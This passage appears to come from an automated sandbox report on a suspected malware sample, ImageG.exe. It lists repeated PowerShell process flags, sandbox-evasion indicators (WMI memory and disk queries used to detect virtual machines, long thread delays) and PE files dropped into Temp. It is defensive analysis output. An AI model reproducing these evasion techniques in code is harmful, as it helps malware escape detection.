        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Queries memory information (via WMI often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_logicaldisk
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_logicaldisk
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_logicaldisk
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9808
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8697
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1088
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8874
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 971
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8947
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 833
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8222
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1597
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9529
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9355
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 374
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1149
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8570
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9430
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9304
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 488
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8450
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1311
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9262
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 512
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1587
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8203
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8719
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1136
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6563
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3254
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9322
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 467
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8538
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1276
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7618
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2088
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6629
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2948
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6630
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2956
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4513
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4776
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5944
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3581
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5077
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4093
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4110
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5258
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3406
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6162
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3834
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5476
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3045
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6305
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2444
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7050
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8860
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 995
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9350
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 489
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9545
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ImageG.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\db804694-6538-41b3-8e68-e762db905f28.tmp.nodeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\76aeac75-a5b5-4872-b3c5-27d2191829fa.tmp.nodeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\797897d5-a581-42d8-bf0e-306300e4549c.tmp.nodeJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\libEGL.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\resources\elevate.exeJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\vk_swiftshader.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\d3dcompiler_47.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\vulkan-1.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\libGLESv2.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\System.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\db715fb8-1e47-440d-93b6-4939c549fe98.tmp.nodeJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\nsis7z.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2676205f-d0b6-44b9-8574-4cede5e50ea9.tmp.nodeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3500Thread sleep count: 9808 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep count: 91 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568Thread sleep count: 8697 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2748Thread sleep count: 1088 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep count: 8874 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep count: 971 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1956Thread sleep count: 8947 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1956Thread sleep count: 833 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884Thread sleep count: 8222 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5644Thread sleep count: 1597 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep count: 9529 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep count: 294 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208Thread sleep count: 9355 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208Thread sleep count: 374 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6892Thread sleep count: 1149 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 592Thread sleep count: 8570 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4988Thread sleep count: 9430 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020Thread sleep count: 342 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8212Thread sleep count: 9304 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8216Thread sleep count: 488 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400Thread sleep count: 8450 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8400Thread sleep count: 1311 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556Thread sleep count: 9262 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556Thread sleep count: 512 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804Thread sleep count: 1587 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804Thread sleep count: 8203 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8852Thread sleep count: 8719 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8856Thread sleep count: 1136 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9784Thread sleep count: 9322 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9780Thread sleep count: 467 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9920Thread sleep count: 8538 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9908Thread sleep count: 1276 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10040Thread sleep count: 7618 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10040Thread sleep count: 2088 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10168Thread sleep count: 6629 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10172Thread sleep count: 2948 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4264Thread sleep count: 6630 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4264Thread sleep count: 2956 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep count: 4513 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep count: 4776 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512Thread sleep count: 5944 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512Thread sleep count: 3581 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8952Thread sleep count: 5077 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8956Thread sleep count: 4093 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8444Thread sleep count: 4110 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8448Thread sleep count: 5258 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 3406 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep count: 6162 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep count: 3834 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep count: 5476 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep count: 3045 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep count: 6305 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032Thread sleep count: 2444 > 30
